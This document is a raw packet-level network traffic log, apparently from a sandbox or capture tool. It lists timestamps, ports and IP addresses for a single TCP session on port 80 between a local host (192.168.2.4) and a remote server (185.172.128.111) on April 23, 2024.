Apr 23, 2024 09:27:05.040504932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040518045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040543079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040544033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040579081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040587902 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040616035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040627956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040652037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040674925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040688038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040700912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040724039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040735960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040766001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040774107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040802002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040816069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040838957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040853977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040875912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040889978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040914059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040923119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.040955067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.040966034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.041001081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.077260971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.283246040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385685921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385746002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385782957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385823011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385859013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385894060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385927916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385951996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.385961056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.385951996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.385951996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.385952950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.385952950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.385952950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.386065006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.386065006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.386169910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.386209011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.386225939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.386245966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.386279106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.386291981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.386291981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.386331081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436278105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436319113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436353922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436404943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436494112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436494112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436494112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436494112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436503887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436547995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436569929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436584949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436594009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436616898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436650038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436682940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.436891079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436928034 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436963081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.436995029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437067032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437067032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437067032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437067986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437190056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437228918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437238932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437266111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437267065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437298059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437340021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437340021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437513113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437581062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437617064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437649012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437700987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437701941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437701941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437843084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437936068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.437942028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437980890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.437994003 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.438014984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.438039064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.438057899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487024069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487062931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487098932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487124920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487132072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487126112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487168074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487212896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487212896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487212896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487222910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487258911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487266064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487289906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487298965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487333059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487627029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487663031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487689972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487699032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487713099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487730980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487751961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487772942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.487951994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.487988949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488010883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488023996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488029957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488055944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488071918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488121033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488279104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488317013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488338947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488351107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488358974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488384962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488399029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488426924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488682985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488718033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488739014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488754034 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488765955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488786936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.488802910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488826036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.488996983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489033937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489051104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489070892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489080906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489103079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489120960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489146948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489412069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489449024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489470005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489483118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489490986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489516973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489528894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489557028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489696026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489733934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489754915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489769936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489780903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489801884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489821911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489842892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.489959002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.489996910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490014076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490032911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490046024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490066051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490082979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490120888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490349054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490405083 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490427971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490463972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490478992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490495920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490509987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490546942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490711927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490747929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490768909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490783930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490797043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490817070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.490833998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490858078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.490993977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.491051912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.491054058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.491087914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.491100073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.491122007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.491142035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.491163015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538188934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538229942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538265944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538299084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538367987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538382053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538382053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538382053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538382053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538419962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538456917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538465977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538465977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538490057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538500071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538530111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538628101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538664103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538698912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538731098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.538811922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538813114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538813114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.538813114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539056063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539093018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539112091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539128065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539134979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539160967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539186001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539206982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539376020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539412975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539442062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539463043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539463997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539495945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539513111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539561033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539763927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539823055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539855003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539891958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539906025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539925098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.539938927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.539984941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540092945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540146112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540182114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540193081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540193081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540214062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540232897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540256977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540478945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540514946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540544987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540550947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540566921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540582895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540591002 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540627956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540729046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540766954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540790081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540810108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540833950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540865898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.540882111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.540905952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.541080952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.541116953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.541141033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.541158915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.541162014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.541192055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.541210890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.541234016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.541408062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.541445017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.541465998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.541487932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.542499065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.542556047 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.591689110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.591826916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.591866970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.591903925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.591934919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.591934919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.591934919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.592008114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.592015982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.592057943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.592077017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.592094898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.592124939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.592147112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.592168093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.592185020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.592194080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.592230082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.592231989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.592267036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.592286110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.592320919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.593292952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.593359947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642256975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642362118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642401934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642436981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642440081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642440081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642441034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642472982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642509937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642546892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642565012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642565012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642565012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642582893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642591953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642632961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642638922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.642687082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.642828941 CEST	80	49730	185.172.128.111	192.168.2.4
